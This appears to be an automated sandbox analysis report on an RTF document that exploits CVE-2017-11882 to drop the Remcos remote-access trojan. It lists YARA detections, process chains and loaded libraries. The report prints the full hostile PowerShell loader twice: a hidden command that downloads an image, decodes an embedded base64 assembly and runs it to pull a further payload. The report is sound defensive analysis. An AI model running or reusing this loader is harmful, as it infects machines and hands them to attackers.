                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winRTF@10/19@470/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7A2E.tmp
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................T.r.u.e.(.P.....4.......<...............w".........................s............(.1.............@.1.............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ....................................u.e.(.P.....4.......<...............|".........................s............(.1.............................
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf ReversingLabs: Detection: 50%
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: webio.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: credssp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: shcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: rstrtmgr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: bcrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK.0.dr, LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                Source: Window Recorder, Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00608F60 push eax; retf 2_2_00608F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060CB52 push esp; retf 2_2_0060CB55
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060CB58 push esp; retf 2_2_0060CB59
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005FF762 push 13C981EFh; retf 2_2_005FF767
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005FF893 push ebx; iretd 2_2_005FF896
